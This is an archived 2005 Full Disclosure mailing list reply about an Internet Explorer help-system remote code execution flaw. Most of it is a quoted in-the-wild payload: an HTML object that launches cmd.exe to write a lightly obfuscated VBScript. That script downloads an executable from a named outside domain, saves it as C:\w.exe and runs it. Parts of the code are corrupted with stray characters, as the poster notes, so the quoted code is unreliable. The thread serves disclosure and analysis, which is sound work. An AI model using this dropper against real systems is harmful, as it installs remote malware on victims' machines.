Full Disclosure mailing list archives
Re: Internet Explorer Help System RCE
From: Duncan Hill <dhill+fulldisc () cricalix net>
Date: Fri, 13 May 2005 06:25:54 +0100
On Friday 13 May 2005 06:15, Mike Allen wrote:
iframedollars.biz/dl/adv622/JQTmudI.jpg
Modded it slightly to do alert instead of document.write and executed on my Linux box. u Q< WVruCP A<object id=a classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11> <param name=command ______alue=shortcut> <param name=item1 __alue=',cmd.exe,/c start /min cmd.exe /c "echo on error resume next : set o = CreateObject("msxm"+"l2.X"+"MLH"+"TTP") : o.open "G"+"ET","http://iframedollars.biz/dl/loadad____622.exe",False : o.send : set s = createobject("adod"+"b.str"+"eam") : s.type=1 : s.open : s.write o.responseBody : s.sa____etofile "C:"+"\"+"w.e"+"xe",2 > c:\c.___bs&&wscript c:\c.______bs&&del c:\c.___bs&&if exist c:\w.exe start c:\w.exe"'> </object> <script> Not sure if the corruption is from editing the script. Oh, that script at the end is javascript btw, not php. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Internet Explorer Help System RCE Mike Allen (May 12)
- Re: Internet Explorer Help System RCE Duncan Hill (May 12)